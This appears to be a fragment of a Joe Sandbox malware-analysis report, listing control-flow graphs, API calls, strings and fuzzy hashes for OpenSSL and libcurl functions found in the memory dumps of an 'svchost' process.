                                                                                                                                                                                • Instruction Fuzzy Hash: 35927121A08B8285FB658F69A8503BA77A0BF4D7C8F084135DB4D47B95DF7CE54ACB08

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 516 7ff8a92e42d0-7ff8a92e431e call 7ff8a935edf0 * 2 522 7ff8a92e4355-7ff8a92e436d call 7ff8a92e2f50 516->522 523 7ff8a92e4320-7ff8a92e4350 ERR_new ERR_set_debug ERR_set_error 516->523 527 7ff8a92e4373-7ff8a92e437a call 7ff8a92dbff0 522->527 528 7ff8a92e487b 522->528 524 7ff8a92e4887-7ff8a92e489a 523->524 532 7ff8a92e43a3-7ff8a92e43c0 CRYPTO_zalloc 527->532 533 7ff8a92e437c-7ff8a92e439e ERR_new ERR_set_debug 527->533 530 7ff8a92e487d-7ff8a92e4882 528->530 530->524 532->528 535 7ff8a92e43c6-7ff8a92e43df CRYPTO_THREAD_lock_new 532->535 534 7ff8a92e4867-7ff8a92e486e ERR_set_error 533->534 538 7ff8a92e4873-7ff8a92e4876 call 7ff8a92e3a70 534->538 536 7ff8a92e43e1-7ff8a92e43e6 ERR_new 535->536 537 7ff8a92e4408-7ff8a92e440e 535->537 539 7ff8a92e43eb-7ff8a92e4403 ERR_set_debug 536->539 540 7ff8a92e4435-7ff8a92e44b9 OPENSSL_LH_new OPENSSL_LH_set_thunks 537->540 541 7ff8a92e4410-7ff8a92e442f CRYPTO_strdup 537->541 538->528 539->534 544 7ff8a92e44bb-7ff8a92e44c5 ERR_new 540->544 545 7ff8a92e44ca-7ff8a92e44d6 X509_STORE_new 540->545 541->538 541->540 544->539 546 7ff8a92e44ff-7ff8a92e4514 call 7ff8a935e78e 545->546 547 7ff8a92e44d8-7ff8a92e44fa ERR_new ERR_set_debug 545->547 550 7ff8a92e4516-7ff8a92e4538 ERR_new ERR_set_debug 546->550 551 7ff8a92e453d-7ff8a92e4547 call 7ff8a92e0eb0 546->551 547->534 550->534 554 7ff8a92e4570-7ff8a92e457a call 7ff8a92f9f30 551->554 555 7ff8a92e4549-7ff8a92e454e ERR_new 551->555 559 7ff8a92e457c-7ff8a92e4586 ERR_new 554->559 560 7ff8a92e4588-7ff8a92e4592 call 7ff8a92fa030 554->560 556 7ff8a92e4553-7ff8a92e456b ERR_set_debug 555->556 556->534 559->556 563 7ff8a92e4594-7ff8a92e459e ERR_new 560->563 564 7ff8a92e45a0-7ff8a92e45aa call 7ff8a92fa8b0 560->564 563->556 567 7ff8a92e45ac-7ff8a92e45b6 ERR_new 564->567 568 7ff8a92e45b8-7ff8a92e45ca call 7ff8a92ddf60 call 7ff8a92de900 564->568 567->556 573 7ff8a92e45cc-7ff8a92e45d6 ERR_new 568->573 574 7ff8a92e45db-7ff8a92e45f8 call 7ff8a92dd360 568->574 573->556 577 7ff8a92e4609-7ff8a92e462f call 7ff8a92ddf50 call 7ff8a92e02b0 574->577 578 7ff8a92e45fa-7ff8a92e4604 ERR_new 574->578 583 7ff8a92e4845-7ff8a92e4862 ERR_new ERR_set_debug 577->583 584 7ff8a92e4635-7ff8a92e4640 OPENSSL_sk_num 577->584 578->556 583->534 584->583 585 7ff8a92e4646-7ff8a92e4655 call 7ff8a935e6a4 584->585 588 7ff8a92e4657-7ff8a92e465c ERR_new 585->588 589 7ff8a92e4666-7ff8a92e46a3 call 7ff8a92eef20 * 2 OPENSSL_sk_new_null 585->589 588->589 594 7ff8a92e46a5-7ff8a92e46aa ERR_new 589->594 595 7ff8a92e46b4-7ff8a92e46c3 OPENSSL_sk_new_null 589->595 594->595 596 7ff8a92e46c5-7ff8a92e46ca ERR_new 595->596 597 7ff8a92e46d4-7ff8a92e46ea CRYPTO_new_ex_data 595->597 596->597 598 7ff8a92e46ec-7ff8a92e46f1 ERR_new 597->598 599 7ff8a92e46fb-7ff8a92e471c call 7ff8a935e5e4 597->599 598->599 599->538 602 7ff8a92e4722-7ff8a92e472d 599->602 603 7ff8a92e472f-7ff8a92e4734 call 7ff8a92de880 602->603 604 7ff8a92e473b-7ff8a92e4769 RAND_bytes_ex 602->604 603->604 606 7ff8a92e47a3 604->606 607 7ff8a92e476b-7ff8a92e4783 RAND_priv_bytes_ex 604->607 610 7ff8a92e47ae-7ff8a92e47c6 RAND_priv_bytes_ex 606->610 607->606 609 7ff8a92e4785-7ff8a92e47a1 RAND_priv_bytes_ex 607->609 609->606 609->610 611 7ff8a92e47ec-7ff8a92e47f6 call 7ff8a93041f0 610->611 612 7ff8a92e47c8-7ff8a92e47ea ERR_new ERR_set_debug 610->612 615 7ff8a92e4807-7ff8a92e4843 call 7ff8a92f04f0 611->615 616 7ff8a92e47f8-7ff8a92e47fd ERR_new 611->616 612->534 615->530 616->615
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                • String ID: SSL_CTX_new_ex$ssl\ssl_lib.c
                                                                                                                                                                                • API String ID: 1552677711-2988157636
                                                                                                                                                                                • Opcode ID: bd4f8abbadecd660465466e1fba590895c6cb3e175742147c6ed86b33c78af61
                                                                                                                                                                                • Instruction ID: 04f3ec8c65253e23fb19e3c7f32f29bc557adfc5e80dc02b5beb5e9d9a409497
                                                                                                                                                                                • Opcode Fuzzy Hash: bd4f8abbadecd660465466e1fba590895c6cb3e175742147c6ed86b33c78af61
                                                                                                                                                                                • Instruction Fuzzy Hash: 42E19D21A0FAC3B9FB60EF69D8513B926A1EF447C4F446035DA5DCA6CAEE3CE5018351

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 619 7ff8a92edaa0-7ff8a92edad4 call 7ff8a935edf0 CRYPTO_zalloc 622 7ff8a92edad6-7ff8a92edadd 619->622 623 7ff8a92edade-7ff8a92edb01 CRYPTO_THREAD_lock_new 619->623 624 7ff8a92edb03-7ff8a92edb1a CRYPTO_new_ex_data 623->624 625 7ff8a92edb2d-7ff8a92edb42 CRYPTO_free 623->625 626 7ff8a92edb20-7ff8a92edb29 CRYPTO_THREAD_lock_free 624->626 627 7ff8a92edbe1-7ff8a92edc25 call 7ff8a932fe80 624->627 628 7ff8a92edb45-7ff8a92edb76 ERR_new ERR_set_debug ERR_set_error 625->628 626->625 637 7ff8a92edc27-7ff8a92edc39 627->637 638 7ff8a92edc3f-7ff8a92edc9e OPENSSL_sk_dup 627->638 630 7ff8a92edbc8 628->630 631 7ff8a92edb78-7ff8a92edb82 628->631 633 7ff8a92edbca-7ff8a92edbe0 630->633 631->630 632 7ff8a92edb84-7ff8a92edb99 CRYPTO_free_ex_data 631->632 635 7ff8a92edba1-7ff8a92edbc3 call 7ff8a92e3a70 CRYPTO_THREAD_lock_free CRYPTO_free 632->635 636 7ff8a92edb9b 632->636 635->630 636->635 637->638 640 7ff8a92edcd3-7ff8a92edce9 call 7ff8a92dcb70 638->640 641 7ff8a92edca0-7ff8a92edcce ERR_new ERR_set_debug ERR_set_error 638->641 640->628 645 7ff8a92edcef-7ff8a92edd6d 640->645 641->631 645->631 646 7ff8a92edd73-7ff8a92eddba X509_VERIFY_PARAM_new 645->646 647 7ff8a92eddef-7ff8a92ede07 X509_VERIFY_PARAM_inherit call 7ff8a931aa30 646->647 648 7ff8a92eddbc-7ff8a92eddea ERR_new ERR_set_debug ERR_set_error 646->648 651 7ff8a92ede1c 647->651 652 7ff8a92ede09-7ff8a92ede12 call 7ff8a931aa40 647->652 648->631 654 7ff8a92ede1e-7ff8a92ede2a call 7ff8a931aa30 651->654 652->651 657 7ff8a92ede14-7ff8a92ede1a 652->657 659 7ff8a92ede44-7ff8a92eded6 654->659 660 7ff8a92ede2c-7ff8a92ede35 call 7ff8a931aa40 654->660 657->654 662 7ff8a92edf17-7ff8a92edf21 659->662 663 7ff8a92eded8-7ff8a92edefb CRYPTO_memdup 659->663 660->659 669 7ff8a92ede37-7ff8a92ede3e 660->669 667 7ff8a92edf65-7ff8a92edf73 662->667 668 7ff8a92edf23-7ff8a92edf49 CRYPTO_memdup 662->668 665 7ff8a92edefd-7ff8a92edf04 663->665 666 7ff8a92edf09-7ff8a92edf10 663->666 665->631 666->662 672 7ff8a92edf75-7ff8a92edf98 CRYPTO_malloc 667->672 673 7ff8a92edfca-7ff8a92ee003 call 7ff8a931aa30 667->673 670 7ff8a92edf57-7ff8a92edf5e 668->670 671 7ff8a92edf4b-7ff8a92edf52 668->671 669->659 670->667 671->631 675 7ff8a92edfa6-7ff8a92edfc3 memcpy 672->675 676 7ff8a92edf9a-7ff8a92edfa1 672->676 678 7ff8a92ee005-7ff8a92ee00e call 7ff8a931aa40 673->678 679 7ff8a92ee02c-7ff8a92ee034 673->679 675->673 676->631 678->679 683 7ff8a92ee010-7ff8a92ee025 678->683 679->628 684 7ff8a92ee03a-7ff8a92ee055 679->684 683->679 684->628 686 7ff8a92ee05b-7ff8a92ee0c0 684->686 687 7ff8a92ee0c2-7ff8a92ee0e5 CRYPTO_memdup 686->687 688 7ff8a92ee0f9-7ff8a92ee103 686->688 687->628 691 7ff8a92ee0eb-7ff8a92ee0f2 687->691 689 7ff8a92ee105-7ff8a92ee128 CRYPTO_memdup 688->689 690 7ff8a92ee13c-7ff8a92ee14e 688->690 689->628 692 7ff8a92ee12e-7ff8a92ee135 689->692 693 7ff8a92ee155-7ff8a92ee158 690->693 694 7ff8a92ee150-7ff8a92ee153 690->694 691->688 692->690 693->628 695 7ff8a92ee15e-7ff8a92ee165 693->695 696 7ff8a92ee16b-7ff8a92ee16e 694->696 695->628 695->696 697 7ff8a92ee170-7ff8a92ee180 call 7ff8a9341e60 696->697 698 7ff8a92ee1e9-7ff8a92ee20c 696->698 701 7ff8a92ee1b5-7ff8a92ee1b9 697->701 702 7ff8a92ee182-7ff8a92ee1b0 ERR_new ERR_set_debug ERR_set_error 697->702 698->633 703 7ff8a92ee1bb-7ff8a92ee1be 701->703 704 7ff8a92ee1c9-7ff8a92ee1e3 701->704 702->628 703->704 705 7ff8a92ee1c0-7ff8a92ee1c3 703->705 704->628 704->698 705->628 705->704
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: D_lock_freeO_free$D_lock_newO_free_ex_dataO_new_ex_dataO_zallocR_newR_set_debugR_set_error
                                                                                                                                                                                • String ID: SSL_set_ct_validation_callback$ossl_ssl_connection_new_int$ssl\ssl_lib.c
                                                                                                                                                                                • API String ID: 3044204582-3251968464
                                                                                                                                                                                • Opcode ID: 896650ff81dff64460e0228fb906457a6d897aef76cdc81034e662f89d720e78
                                                                                                                                                                                • Instruction ID: 9cb6de253fb46cac2cf62395a4331d33ce7da40b3d0f105a99ab76b497b10e7f
                                                                                                                                                                                • Opcode Fuzzy Hash: 896650ff81dff64460e0228fb906457a6d897aef76cdc81034e662f89d720e78
                                                                                                                                                                                • Instruction Fuzzy Hash: A1121A3660AFC1A6EB98DF25D5802A973E4FB48B84F485139DB5D8B359EF38E560C310

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 806 7ff8b83b6b50-7ff8b83b6b91 807 7ff8b83b6b93-7ff8b83b6b98 806->807 808 7ff8b83b6b9d-7ff8b83b6ba8 call 7ff8b83b6910 806->808 809 7ff8b83b74bf 807->809 813 7ff8b83b6bb4-7ff8b83b6bc6 call 7ff8b83b8670 808->813 814 7ff8b83b6baa-7ff8b83b6baf 808->814 812 7ff8b83b74c1-7ff8b83b74e5 call 7ff8b83c9e10 809->812 813->809 819 7ff8b83b6bcc-7ff8b83b6bd6 813->819 814->809 820 7ff8b83b6bea-7ff8b83b6bf4 819->820 821 7ff8b83b6bd8-7ff8b83b6be8 _strdup 819->821 822 7ff8b83b6bf6-7ff8b83b6c06 _strdup 820->822 823 7ff8b83b6c08-7ff8b83b6c12 820->823 821->814 821->820 822->814 822->823 824 7ff8b83b6c33-7ff8b83b6c42 call 7ff8b83b74f0 823->824 825 7ff8b83b6c14-7ff8b83b6c24 _strdup 823->825 824->809 829 7ff8b83b6c48-7ff8b83b6c56 824->829 825->814 827 7ff8b83b6c26-7ff8b83b6c2d 825->827 827->824 830 7ff8b83b6c68-7ff8b83b6c72 829->830 831 7ff8b83b6c58-7ff8b83b6c5f 829->831 833 7ff8b83b6c74-7ff8b83b6c7b 830->833 834 7ff8b83b6cbd-7ff8b83b6ccc call 7ff8b83b7960 830->834 831->830 832 7ff8b83b6c61 831->832 832->830 833->834 835 7ff8b83b6c7d-7ff8b83b6cb7 call 7ff8b8394eb0 call 7ff8b83ba7c0 833->835 834->809 840 7ff8b83b6cd2-7ff8b83b6cee 834->840 835->814 835->834 841 7ff8b83b6cf0-7ff8b83b6cf7 840->841 842 7ff8b83b6cf9-7ff8b83b6d00 840->842 841->842 844 7ff8b83b6d03-7ff8b83b6d0a 841->844 842->844 846 7ff8b83b6d22-7ff8b83b6d2e 844->846 847 7ff8b83b6d0c-7ff8b83b6d1c _strdup 844->847 848 7ff8b83b6d30-7ff8b83b6d43 _strdup 846->848 849 7ff8b83b6d46-7ff8b83b6d48 846->849 847->814 847->846 848->849 849->809 850 7ff8b83b6d4e-7ff8b83b6d64 call 7ff8b83b7e20 849->850 850->809 853 7ff8b83b6d6a-7ff8b83b6d71 850->853 854 7ff8b83b6d73-7ff8b83b6d81 call 7ff8b838ec10 853->854 855 7ff8b83b6d87-7ff8b83b6d8e 853->855 854->812 854->855 857 7ff8b83b6d90-7ff8b83b6d9e call 7ff8b838ec10 855->857 858 7ff8b83b6da4-7ff8b83b6dab 855->858 857->812 857->858 860 7ff8b83b6de5-7ff8b83b6dee 858->860 861 7ff8b83b6dad-7ff8b83b6dbb call 7ff8b838ec10 858->861 865 7ff8b83b6df0-7ff8b83b6dfc 860->865 866 7ff8b83b6e07-7ff8b83b6e0e 860->866 861->812 873 7ff8b83b6dc1-7ff8b83b6dc8 861->873 865->866 868 7ff8b83b6dfe-7ff8b83b6e05 865->868 869 7ff8b83b6e10-7ff8b83b6e12 866->869 870 7ff8b83b6e14-7ff8b83b6e1b 866->870 868->866 869->870 871 7ff8b83b6e24-7ff8b83b6e32 869->871 870->871 872 7ff8b83b6e1d 870->872 874 7ff8b83b6e34-7ff8b83b6e41 871->874 875 7ff8b83b6e4e-7ff8b83b6e58 871->875 872->871 873->860 876 7ff8b83b6dca-7ff8b83b6ddc call 7ff8b83ae230 873->876 874->809 884 7ff8b83b6e47 874->884 877 7ff8b83b6e5a-7ff8b83b6e61 875->877 878 7ff8b83b6e68-7ff8b83b6e6f 875->878 876->860 885 7ff8b83b6dde 876->885 877->878 882 7ff8b83b6e83-7ff8b83b6e91 878->882 883 7ff8b83b6e71-7ff8b83b6e78 878->883 887 7ff8b83b6e93-7ff8b83b6e9a 882->887 888 7ff8b83b6e9c 882->888 883->882 886 7ff8b83b6e7a-7ff8b83b6e81 883->886 884->875 885->860 889 7ff8b83b6ea0-7ff8b83b6ebc call 7ff8b8394d90 886->889 887->889 888->889 892 7ff8b83b6ec5-7ff8b83b6ecc 889->892 893 7ff8b83b6ebe-7ff8b83b6ec0 889->893 894 7ff8b83b6ed0-7ff8b83b6ed7 892->894 893->809 894->894 895 7ff8b83b6ed9-7ff8b83b6ef7 call 7ff8b83ae150 894->895 898 7ff8b83b6f92-7ff8b83b6fd5 call 7ff8b83c4ff0 895->898 899 7ff8b83b6efd-7ff8b83b6f36 895->899 898->809 905 7ff8b83b6fdb-7ff8b83b6fea call 7ff8b836ad70 898->905 903 7ff8b83b6f82-7ff8b83b6f8d call 7ff8b83b5fc0 899->903 904 7ff8b83b6f38-7ff8b83b6f52 call 7ff8b8397450 call 7ff8b8369b70 899->904 903->809 904->809 919 7ff8b83b6f58-7ff8b83b6f67 call 7ff8b83b9050 904->919 912 7ff8b83b6ff8-7ff8b83b7001 905->912 913 7ff8b83b6fec-7ff8b83b6ff2 905->913 916 7ff8b83b7007-7ff8b83b702d 912->916 917 7ff8b83b7305-7ff8b83b7316 912->917 913->912 915 7ff8b83b7303 913->915 915->917 920 7ff8b83b705e 916->920 921 7ff8b83b702f-7ff8b83b7036 916->921 922 7ff8b83b7328-7ff8b83b732b 917->922 923 7ff8b83b7318-7ff8b83b731f 917->923 938 7ff8b83b6f69-7ff8b83b6f78 919->938 939 7ff8b83b6f7d call 7ff8b83b4eb0 919->939 930 7ff8b83b7060-7ff8b83b706b 920->930 925 7ff8b83b7041-7ff8b83b704f call 7ff8b8398330 921->925 926 7ff8b83b7038-7ff8b83b703f 921->926 928 7ff8b83b7331-7ff8b83b733f call 7ff8b8369ee0 922->928 929 7ff8b83b749d-7ff8b83b74ba call 7ff8b8374b60 call 7ff8b83b5720 922->929 923->922 927 7ff8b83b7321 923->927 925->920 948 7ff8b83b7051-7ff8b83b7058 925->948 926->920 926->925 927->922 949 7ff8b83b7345-7ff8b83b7348 928->949 950 7ff8b83b748e-7ff8b83b7498 call 7ff8b8374b60 928->950 929->809 935 7ff8b83b7081 930->935 936 7ff8b83b706d-7ff8b83b707b 930->936 937 7ff8b83b7083-7ff8b83b708e 935->937 936->935 943 7ff8b83b707d-7ff8b83b707f 936->943 944 7ff8b83b7090-7ff8b83b7097 937->944 945 7ff8b83b70ad 937->945 938->809 939->903 943->937 944->945 951 7ff8b83b7099-7ff8b83b70a7 944->951 953 7ff8b83b70af-7ff8b83b70ed call 7ff8b836a7b0 945->953 948->920 956 7ff8b83b705a-7ff8b83b705c 948->956 957 7ff8b83b734a-7ff8b83b7376 call 7ff8b8374b60 949->957 958 7ff8b83b737c-7ff8b83b738b call 7ff8b83c4ee0 949->958 950->929 951->945 960 7ff8b83b70a9-7ff8b83b70ab 951->960 953->917 967 7ff8b83b70f3-7ff8b83b70fa 953->967 956->930 957->929 957->958 958->809 966 7ff8b83b7391-7ff8b83b73ab call 7ff8b8397450 call 7ff8b8369b70 958->966 960->953 966->809 978 7ff8b83b73b1-7ff8b83b73b8 966->978 969 7ff8b83b714e-7ff8b83b715d 967->969 970 7ff8b83b70fc-7ff8b83b7147 free * 2 967->970 972 7ff8b83b7163-7ff8b83b7200 free * 4 969->972 973 7ff8b83b7207-7ff8b83b72b5 free * 3 call 7ff8b83b5720 969->973 970->969 972->973 979 7ff8b83b72c0-7ff8b83b72c7 973->979 980 7ff8b83b72b7-7ff8b83b72be 973->980 984 7ff8b83b73ba-7ff8b83b73c0 978->984 985 7ff8b83b73de-7ff8b83b73e5 978->985 982 7ff8b83b72d2 979->982 983 7ff8b83b72c9-7ff8b83b72d0 979->983 981 7ff8b83b72d6-7ff8b83b72fe call 7ff8b8374b60 980->981 987 7ff8b83b740c-7ff8b83b7423 call 7ff8b83b5fc0 call 7ff8b83b9050 981->987 982->981 983->981 984->985 989 7ff8b83b73c2-7ff8b83b73d7 call 7ff8b8374b60 984->989 986 7ff8b83b73e7-7ff8b83b73ee 985->986 985->987 986->987 990 7ff8b83b73f0-7ff8b83b7405 call 7ff8b8374b60 986->990 987->809 1000 7ff8b83b7429-7ff8b83b742f 987->1000 989->985 990->987 1001 7ff8b83b7431-7ff8b83b7435 1000->1001 1002 7ff8b83b7437-7ff8b83b7440 call 7ff8b83b8e00 1000->1002 1003 7ff8b83b744b-7ff8b83b748c call 7ff8b83692b0 1001->1003 1005 7ff8b83b7445-7ff8b83b7449 1002->1005 1003->809 1005->809 1005->1003
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %u/%d/%s$Allowing DoH to override max connection limit$NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                                                                                                                                                                                • API String ID: 0-2902238462
                                                                                                                                                                                • Opcode ID: 64970d08a2448083fbdf1b0ce629b51723a761e48c69f35d378f86bc50785d92
                                                                                                                                                                                • Instruction ID: 5f3706da81002540724fcb50e876bae5e7fb01e10d85c34328b0654de077528a
                                                                                                                                                                                • Opcode Fuzzy Hash: 64970d08a2448083fbdf1b0ce629b51723a761e48c69f35d378f86bc50785d92
                                                                                                                                                                                • Instruction Fuzzy Hash: A3427C62A09BC28AEB558F69D4503A977A4EB49BC8F0C4035CF9D47396DF3CE592C318

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1351 7ff8a9331310-7ff8a933135c call 7ff8a935edf0 1354 7ff8a9331362-7ff8a9331371 1351->1354 1355 7ff8a9331895 1351->1355 1354->1355 1357 7ff8a9331377-7ff8a9331388 1354->1357 1356 7ff8a933189a-7ff8a93318c4 call 7ff8a935ee50 1355->1356 1358 7ff8a933138e-7ff8a9331398 1357->1358 1359 7ff8a9331863-7ff8a9331880 ERR_new ERR_set_debug 1357->1359 1363 7ff8a933139a-7ff8a93313a0 1358->1363 1364 7ff8a93313a6-7ff8a93313ad 1358->1364 1361 7ff8a9331886-7ff8a9331890 call 7ff8a9347c10 1359->1361 1361->1355 1363->1359 1363->1364 1366 7ff8a9331409-7ff8a9331417 1364->1366 1367 7ff8a93313af-7ff8a93313b9 call 7ff8a9330260 1364->1367 1368 7ff8a9331438-7ff8a9331442 call 7ff8a9347900 1366->1368 1369 7ff8a9331419-7ff8a9331420 1366->1369 1377 7ff8a93313bb-7ff8a93313c0 ERR_new 1367->1377 1378 7ff8a93313e3-7ff8a93313f2 1367->1378 1379 7ff8a933146d-7ff8a9331477 1368->1379 1380 7ff8a9331444-7ff8a933144e call 7ff8a9347cb0 1368->1380 1371 7ff8a933142b-7ff8a9331433 call 7ff8a9347df0 1369->1371 1372 7ff8a9331422-7ff8a9331429 1369->1372 1371->1368 1372->1368 1372->1371 1381 7ff8a93313c5-7ff8a93313de ERR_set_debug 1377->1381 1382 7ff8a9331400-7ff8a9331403 1378->1382 1383 7ff8a93313f4-7ff8a93313fe ERR_new 1378->1383 1384 7ff8a9331479-7ff8a933147c 1379->1384 1385 7ff8a93314e3-7ff8a93314e6 1379->1385 1380->1379 1394 7ff8a9331450-7ff8a9331457 1380->1394 1381->1361 1382->1366 1383->1381 1387 7ff8a933150f-7ff8a9331532 ERR_new ERR_set_debug 1384->1387 1388 7ff8a9331482-7ff8a9331489 1384->1388 1390 7ff8a93314e8-7ff8a93314f6 1385->1390 1391 7ff8a93314fd-7ff8a9331500 1385->1391 1387->1361 1392 7ff8a933148b-7ff8a9331492 1388->1392 1393 7ff8a9331494-7ff8a933149b 1388->1393 1390->1391 1395 7ff8a9331502-7ff8a933150a 1391->1395 1396 7ff8a9331537-7ff8a933153e 1391->1396 1392->1387 1392->1393 1393->1387 1399 7ff8a933149d-7ff8a93314cf call 7ff8a9330320 1393->1399 1394->1379 1400 7ff8a9331459-7ff8a9331461 1394->1400 1395->1356 1397 7ff8a9331540-7ff8a933154f 1396->1397 1398 7ff8a9331555-7ff8a9331575 call 7ff8a92ef090 call 7ff8a92ef0f0 1396->1398 1397->1398 1406 7ff8a9331829-7ff8a9331830 1397->1406 1412 7ff8a933157b-7ff8a933157e 1398->1412 1413 7ff8a9331857-7ff8a9331861 ERR_new 1398->1413 1399->1406 1414 7ff8a93314d5-7ff8a93314dc 1399->1414 1400->1356 1409 7ff8a9331467 1400->1409 1406->1356 1409->1355 1409->1379 1412->1413 1416 7ff8a9331584-7ff8a9331587 1412->1416 1415 7ff8a933183c-7ff8a9331855 ERR_set_debug 1413->1415 1414->1385 1415->1361 1416->1413 1417 7ff8a933158d-7ff8a93315ac call 7ff8a9347890 1416->1417 1420 7ff8a93315ae-7ff8a93315b5 1417->1420 1421 7ff8a93315f0-7ff8a9331624 1417->1421 1420->1421 1422 7ff8a93315b7-7ff8a93315c9 call 7ff8a92ebf50 1420->1422 1426 7ff8a933162d-7ff8a9331642 1421->1426 1427 7ff8a9331626-7ff8a9331629 1421->1427 1422->1421 1428 7ff8a93315cb-7ff8a93315da call 7ff8a92ebf50 1422->1428 1429 7ff8a9331648-7ff8a9331656 1426->1429 1430 7ff8a9331832-7ff8a9331837 ERR_new 1426->1430 1427->1426 1428->1421 1441 7ff8a93315dc-7ff8a93315e7 1428->1441 1432 7ff8a9331658-7ff8a933165b 1429->1432 1433 7ff8a9331695-7ff8a933169b 1429->1433 1430->1415 1437 7ff8a933168c-7ff8a9331693 1432->1437 1438 7ff8a933165d-7ff8a9331669 1432->1438 1434 7ff8a933169d-7ff8a93316ad 1433->1434 1435 7ff8a93316e3 1433->1435 1440 7ff8a93316b0-7ff8a93316e1 1434->1440 1439 7ff8a93316e6-7ff8a9331700 call 7ff8a9336a60 1435->1439 1437->1439 1442 7ff8a9331670-7ff8a933168a 1438->1442 1443 7ff8a9331703-7ff8a9331705 1439->1443 1440->1435 1440->1440 1441->1421 1442->1437 1442->1442 1444 7ff8a933170b-7ff8a9331715 1443->1444 1445 7ff8a933181d 1443->1445 1446 7ff8a933171b-7ff8a933171e 1444->1446 1447 7ff8a93317e0-7ff8a933181b ERR_new ERR_set_debug call 7ff8a9347c10 1444->1447 1448 7ff8a9331824 1445->1448 1449 7ff8a9331720-7ff8a9331723 1446->1449 1450 7ff8a9331787-7ff8a933179d 1446->1450 1447->1356 1448->1406 1452 7ff8a9331779-7ff8a9331782 1449->1452 1453 7ff8a9331725 1449->1453 1450->1448 1457 7ff8a93317a3-7ff8a93317db ERR_new ERR_set_debug call 7ff8a9347c10 1450->1457 1452->1356 1453->1448 1456 7ff8a933172b-7ff8a933172d 1453->1456 1456->1406 1458 7ff8a9331733-7ff8a933173d 1456->1458 1457->1356 1460 7ff8a9331759-7ff8a9331774 1458->1460 1461 7ff8a933173f-7ff8a9331743 1458->1461 1460->1356 1463 7ff8a933174e-7ff8a9331754 1461->1463 1464 7ff8a9331745-7ff8a933174c 1461->1464 1463->1421 1464->1460 1464->1463
                                                                                                                                                                                APIs
                                                                                                                                                                                • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FF8A9352E39), ref: 00007FF8A93313BB
                                                                                                                                                                                • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FF8A9352E39), ref: 00007FF8A93313D3
                                                                                                                                                                                • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FF8A9352E39), ref: 00007FF8A93313F4
                                                                                                                                                                                • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FF8A9352E39), ref: 00007FF8A933150F
